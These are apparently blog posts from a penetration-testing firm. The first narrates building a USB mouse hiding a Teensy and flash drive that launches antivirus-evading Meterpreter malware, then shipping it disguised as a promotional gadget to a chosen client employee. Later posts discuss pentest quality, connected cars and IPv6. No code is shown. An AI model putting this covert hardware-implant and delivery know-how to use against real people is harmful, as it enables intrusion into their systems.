Once the top of the mouse was gutted and all the unnecessary parts removed we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable and cut one of the ends off, leaving about 1 inch of wire near the connector. Then we stripped all of the plastic off of the connector and stripped a small amount of wire from the 4 internal wires. We soldered those four wires to the USB board, making sure to follow the right pinout pattern. This is the cable that will plug into the Teensy’s mini USB port when we insert the Teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end, leaving 2 inches of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub, making sure to follow the right pinout patterns mentioned above. This is an important cable as it’s the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we had three cables soldered to the USB hub. Just to recap, those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the Teensy device. The next and most challenging part was to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the attack would be mostly moot. (We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we took the end from previously. We stripped the ends of the wires in the cable and carefully soldered them to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving ourselves the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape to avoid any shorts. Once everything was packed in, we plugged in and tested the devices. The USB drive mounted, the Teensy card was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using McAfee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering, but we certainly were allowed to do reconnaissance against social networks. With McAfee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, and we wanted the capabilities provided by Meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…

Update: As of 06/29/2011 9AM EST: this variant of our pseudomalware is being detected by McAfee.

Update: As of 06/29/2011 10:47AM EST: we’ve created a new variant that seems to bypass any AV.

To make this happen we created a Meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up, and injected it into a wrapper of sorts of our own. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and evade detection by McAfee. When we ran our tests on a machine running McAfee, the malware ran without a hitch. We should point out that our ability to evade McAfee isn’t any indication of its quality, and that we can evade any antivirus solution using similar custom attack methodologies. After all, it’s impossible to detect something if you don’t know what you are looking for. (It also helps to have a team of researchers at our disposal.)

Once we had our malware built, we loaded it onto the flash drive that we had soldered into our mouse. Then we wrote some code for the Teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw’s website; he deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.

Usage: Plug mouse into computer, get pwned.

The last and final step was to ship the mouse to our customer. One of the most important aspects of this was repacking the mouse in its original packaging so that it appeared unopened. Then we used Jigsaw to purchase a list of our client’s employees. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse to look like a promotional gadget, added fake marketing flyers, etc., then shipped it. Sure enough, three days later the mouse called home.


Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries.  For example, Penetration Tests are used to assess the effectiveness of body armor.  This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”).  In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.
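The bracketed definition is simple enough to state as a one-liner. In the sketch below, the 0-to-1 probability and 1-to-10 impact scales are our own illustrative choice of units, not a prescribed standard:

```python
# risk = probability x impact, as defined above.
# The scales (0-1 probability, 1-10 impact) are illustrative assumptions.
def risk(probability, impact):
    return probability * impact

# Two flaws with identical impact are ranked by likelihood of exploitation:
likely_flaw = risk(0.9, 9)    # near-certain exploitation, severe impact
unlikely_flaw = risk(0.1, 9)  # improbable exploitation, same impact
```

This is why testing at a realistic threat level matters: an unrealistic test mis-estimates the probability term and therefore the risk.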

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks.  Each of the top-level categories can operate in a standalone configuration or can be used to augment the other.  For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone.  Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat.  The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.


Netragard: Connect to chaos

The Chevy Volt will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no fewer than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firm Netragard, very worried.  Before now, you needed physical access to reprogram the software inside a car: an ‘air gap’ protected vehicles from remote tampering. The Volt will have no such physical defence. Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming ‘hugely vulnerable 5000lb pieces of metal’.

Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.”

The full article can be found here.


Netragard’s thoughts on Pentesting IPv6 vs IPv4

We’ve heard a bit of “noise” about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6.  Let’s be clear: anyone telling you that IPv6 makes penetration testing harder doesn’t understand the first thing about real penetration testing.

What’s the point of IPv6?

IPv6 was designed by the Internet Engineering Task Force (“IETF”) to address the issue of IPv4 address space exhaustion.  IPv6 uses a 128-bit address space while IPv4 uses only 32 bits.  That yields 2^128 possible IPv6 addresses, far more than the 2^32 addresses available with IPv4.  It also means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.

What about increased security with IPv6?

The IPv6 specification mandates support for the Internet Protocol Security (“IPSec”) protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP packet. IPSec operates at the Internet layer of the Internet Protocol suite and so differs from other security systems like the Secure Sockets Layer, which operates at the application layer. This is the only significant security enhancement that IPv6 brings to the table, and even this has little to no impact on penetration testing.

What some penetration testers are saying about IPv6.

Some penetration testers argue that IPv6 will make the job of a penetration tester more difficult because of the massive increase in potential targets. They claim that this increase will make the process of discovering live targets impossibly time consuming, arguing that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years.  But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?
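The back-of-the-envelope arithmetic behind that claim is easy to reproduce. The probe rate below is an assumption of ours (not the figure those testers used), but any realistic rate produces an absurd total for a brute-force IPv6 sweep while the equivalent IPv4 sweep finishes in about an hour:

```python
# Why brute-force sweeping IPv6 space is a dead end, by the numbers.
# PROBES_PER_SECOND is an assumed scanner throughput, not a measured one.
ADDRESSES_V6 = 2 ** 128
ADDRESSES_V4 = 2 ** 32
PROBES_PER_SECOND = 1_000_000
SECONDS_PER_YEAR = 31_557_600

years_v6 = ADDRESSES_V6 / (PROBES_PER_SECOND * SECONDS_PER_YEAR)
years_v4 = ADDRESSES_V4 / (PROBES_PER_SECOND * SECONDS_PER_YEAR)
print(f"full IPv6 sweep: ~{years_v6:.1e} years; IPv4 sweep: ~{years_v4:.1e} years")
```

The exact figure depends entirely on the assumed rate, which is precisely the point: no rate makes exhaustive scanning viable, so target identification has to come from reconnaissance instead.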

The very first step in any penetration test is effective and efficient reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attack.  There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement.  Failure to adapt will result in bad intelligence, as no two targets are exactly identical.

A small component of reconnaissance is target identification.  Target identification may or may not be done with scanning, depending on the nature of the penetration test.  Specifically, it is impossible to deliver a true stealth/covert penetration test with automated scanners.  Likewise, it is very difficult to use a scanner to accurately identify targets in a network that is protected by reactive security systems (like a well-configured IPS that supports black-listing).  So in many cases doing discovery by scanning an entire block of addresses is ineffective.

A few common methods for target identification include Social Engineering, DNS enumeration, or something as simple as asking the client to provide a list of targets.  Less common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc.  Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.

Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network.  The number of real targets is what matters, not the number of potential targets.  It would be a ridiculous waste of time to test 2^128 IPv6 addresses when only 12 are live.  Not to mention that the increase in time would likely translate into an increase in project cost.

So in reality, for those who are interested, hacking an IPv6 network won’t be any more or less difficult than hacking an IPv4 network.  Anyone that argues otherwise either doesn’t know what they are doing or they are looking to charge you more money for roughly the same amount of work.
